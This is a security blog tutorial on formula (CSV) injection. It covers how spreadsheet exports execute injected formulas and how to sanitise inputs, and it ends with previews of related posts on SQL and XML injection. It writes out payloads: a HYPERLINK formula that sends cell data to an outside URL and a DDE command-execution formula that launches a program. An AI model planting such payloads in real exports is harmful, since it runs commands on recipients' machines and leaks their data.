Formula Injection

  

What is Formula injection?

📌Formula injection, also known as CSV Injection occurs when the application export dynamically constructed spreadsheet documents (example .csv or .xls) which may contain untrusted user-supplied data.

📌Upon opening the exported document, recipient's spreadsheet program can interpret those untrusted data/inputs as formulas and execute them on the recipient's system.

📌The attacker usually injects a malicious payload or formula into the input field. Once the data is exported and the file is opened, the spreadsheet application interprets and executes the malicious input on the assumption of a standard macro.

How does it happen?  

  • A spreadsheet program such as Microsoft Excel or Libre Office Calc etc. provides various in-built functions and formulas that can be used to perform other data analysis. 
  • In the case of formula injection, any cells starting with special characters, eg, "=", "+", "-", or "@" are treated as formulas and executed by the program upon opening the spreadsheet. 

CSV injection can be exploited in two ways:


1) Hyperlink function in excel : 

  • The HYPERLINK function in Excel is used to create a reference (shortcut) that directs the user to the specified location in the same document or opens another document or web-page. 
  • This Hyperlink formula can be leveraged by an attacker to trick the victim into navigating to an attacker-controlled site. 

 Syntax: HYPERLINK(link_location, [friendly_name])

link_location -  URL/file path 

friendly_name - The jump text or numeric value that is displayed in the cell.

Example

=HYPERLINK(“http://testasp.vulnweb.com/Login.asp"&A2&B2, “Click here”)

Let’s take an example of Employee Management System. The application is used to maintain details of employees working in any organization, which includes Adding new employee and exporting the list of existing employees

(i) When adding new employee details, the attacker injects the HYPERLINK function into the address field-



(ii) The application doesn't validate user input properly.



(iii) The exported CSV file contains malicious payload that will execute on the victim's system.


2) Command Execution :

  • Excel provides DDE (Dynamic Data Exchange) functionality. DDE is an interprocess communication system, which allows data to be transmitted or shared between applications in operating systems such as Windows. 
  • The formula/input can be executed as soon as the spreadsheet opens. This way the user has no control over it and the execution cannot be stopped. However, a few spreadsheet applications do warn the users before opening such files. 
  • ExampleTo open the calculator application on excel.

 =cmd|’ /C calc’!’A1′

This can then be elevated to remote code execution through numerous methods.

Payloads :




How to prevent Formula Injection? 


1) Sanitize/Validate all user input before inserting it into spreadsheet data fields. The best way to mitigate against this type of attack is to make sure all users’ inputs are filtered so only expected characters are allowed


2) Ensure that no cells begins with any of the following characters: Equal to("=")plus ("+"), minus ("-"),At ("@"). 


3) Applications may add a single-quote(') to the beginning of a cell containing such characters. Adding a single-quote() tells Excel that the cell doesn’t contain formula and on viewing the MS Excel does not display single-quote(‘) when entered as the first character in the cell. 


4) If the cell value starts with  "=" character, convert it to HTML encoding. Howerve, the integrity of legitimate user-input must be considered first.


5) Finally, it is also the responsibility of client side spreadsheet applications to prevent such attacks.

 For example, a recent Microsoft Excel Office update disabled Dynamic Data Exchange (DDE) execution by default.



References :

https://owasp.org/www-community/attacks/CSV_Injection
https://github.com/payloadbox/csv-injection-payloads

Thanks for reading J 

Feel free to point out any mistakes or let me know if there is anything I should add J 

Keep Learning, Keep growing J 




Comments

Post a Comment

Popular posts from this blog

SQL Injection – “Let’s dump the database”

Image
  What is SQL injection? ✔ SQL injection is a code injection technique that uses malicious SQL code to access information/data that was not intended to be displayed. It can be used to obtain unauthorized access to the underlying data, structure, and DBMS.  ✔ SQL Injection attacks are one of the oldest, most prevalent, and most dangerous web application vulnerabilities. The OWASP organization lists injections in their OWASP Top 10 2017 document as the number 1 threat to web application security.  ✔ SQL injection vulnerability occurs when the application sends user input to the interpreter without sanitizing it and user input can be used to query database. SQL queries are used to execute commands, such as data retrieval, updates, and record removal. Types Of SQL Injection Attacks : SQL Injection can be classified into three major categories In-band SQL Injection Inferential SQL Injection Out-of-band SQL Injection 1) In-band SQL Injections When the attacker uses the same communication c
Read more

XML Injection

Image
  XML injection is an attack technique used to manipulate or compromise the logic of an XML application or service.It allows an attacker to inject malicious and/or unexpected input that can break XML logic. Depending on the functionality and XML usage of an application, a successful XML injection may cause unauthorized access to resources and sensitive data disclosure. What is XML? ✔ XML stands for eXtensible Markup Language.  ✔ It is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. It is  designed to store and transport data. XML is  extensible and hence can be tailored according to the application. ✔ XML uses a tree-like structure (XML Tree structure) of tags and data where tags can be user defined. To interpret XML data, an application needs XML parser, also known as the XML processor. Example : An XML document is always descriptive and can be referred as XML tree structure. XML Entities :  XML entiti
Read more